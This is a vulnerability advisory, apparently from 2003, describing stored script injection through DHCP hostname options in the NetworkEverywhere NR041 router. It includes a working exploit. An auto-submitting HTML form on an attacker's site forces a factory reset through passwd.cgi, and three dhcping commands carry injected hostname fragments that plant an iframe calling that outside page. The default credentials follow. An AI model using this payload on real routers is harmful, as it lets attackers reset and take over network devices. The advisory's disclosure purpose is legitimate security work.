NetworkEverywhere  router  Model NR041 (latest firmware rev 1.2 Release 03)
suffers a "script injection over dhcp" vulnerability.


The NR041 does not filter DHCP HOSTNAME options coming from its clients.
Because of that, we can inject a web script into the web based
administrative interface and wait until the administrator consults the DHCP
interface after what the injected script is executed within the open session
and therefore with full access on the router. This exploit allows a
malicious user to reset the box's factory setting, restoring the default
password, in this case:
Administrator: none
Password: admin.

 NR041's dhcp daemon is reachable from the inside and offers no wireless
access therefore this flaw is not easy to exploit but still, a successful
exploitation will have critical impact.

 EXPLOITATION: (using DHCPing available at
http://c3rb3r.openwall.net/dhcping/):



As mentioned above,  NR041 is configurable via a web based administrative
interface using several cgis and invoked with the HTTP POST method.
It's not easy to write a useful script in 15 characters when you can't break
the string wherever you wish, the same 'id="' trick used for exploitation of
the DLINK 614+ will be valuable here.


STEP1:

Because we don't have enough room to exploit the router in one shot, we will
inject an iframe into the router to force the administrator to remotely call
"a.htm" on the malicious web site.
"a.htm"  contains a form which auto-submit itself when loaded.
First of all, place the following code on the web server and choose a
one-character name to save place. This code is installed on the remote
malicious site and contains the actual attack (a call to passwd.cgi with
factorydefaults enabled).
Note that we have hard-coded the router ip (192.168.1.1) in this script (we
can dynamically get it from the HTTP referer header) so change it
accordingly to your configuration.

<html><head>
<script language="JavaScript">
<!--
function SymError()
{
  return true;
}
window.onerror = SymError;
//-->
</script>
<script language="javascript">
function autopost(){
}
</script>
</head><body onload="javascript:document.xx.submit();">
<form name=xx method=post action="http://192.168.1.1/passwd.cgi">
<input type=hidden name=FactoryDefaults value="Enable">
</form>
</body></html>



STEP2:

Inject our script into the router using DHCPing :

dhcping -optleasetime 3600 -opttype discover -optreqip
192.168.1.121 -opthostname "/../a.htm' > " -m af:af:af:af:af:af

dhcping -optleasetime 3600 -opttype discover -optreqip
192.168.1.122 -opthostname "'src='//url.ca/" -m af:af:af:af:af:ae

dhcping -optleasetime 3600 -opttype discover -optreqip
192.168.1.123 -opthostname
"<iframe id=' " -m af:af:af:af:af:ad

(Tested with a Mozilla browser)


PROBLEM: Unfortunately we are limited in space for the malicious URL making
all of this a bit tricky but other means of exploitation may be possible.

Have a nice test ;-)


VENDOR:

NetworkEverywhere support staff has been contacted on August 13th but didn't
reply to my email.

VULNERABLE:

Product Release Date : September 6, 2002
Current Firmware : Version 1.2 Release 03 (latest)
Firmware Date    : May 5, 2003


AUTHOR:

Mathieu Lacroix (Daemonz at videotron.ca)
Thanks to Gregory Duchemin and DHCPing (available at
http://c3rb3r.openwall.net/dhcping/)